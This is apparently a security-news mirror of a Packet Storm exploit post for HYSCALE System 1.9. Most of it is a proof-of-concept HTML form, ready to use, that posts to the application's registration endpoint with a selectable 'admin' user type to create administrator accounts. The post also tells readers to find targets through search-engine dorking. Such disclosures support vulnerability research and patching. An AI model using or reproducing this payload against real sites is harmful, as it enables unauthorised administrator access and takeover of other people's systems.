Security
Headlines
HeadlinesLatestCVEs

Headline

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

Packet Storm
#csrf#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

    <label for="username">Username:</label>  
<input type="text" name="username" id="username" required><br><br>

<label for="email">Email:</label>  
<input type="email" name="email" id="email" required><br><br>

<label for="password">Password:</label>  
<input type="password" name="password" id="password" required><br><br>

<label for="dob">Date of Birth:</label>  
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

<label>Gender:</label><br>  
<input type="radio" name="gender" value="Male" id="male" required>  
<label for="male">Male</label><br>  
<input type="radio" name="gender" value="Female" id="female">  
<label for="female">Female</label><br><br>

<label for="usertype">User Type:</label>  
<select name="usertype" id="usertype" required>  
    <option value="admin">Admin</option>  
    <option value="user">User</option>  
    <option value="guest">Guest</option>  
</select><br><br>

<label for="target_sales">Target Sales:</label>  
<input type="text" name="target_sales" id="target_sales" required><br><br>

<input type="submit" value="Submit">

</form>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution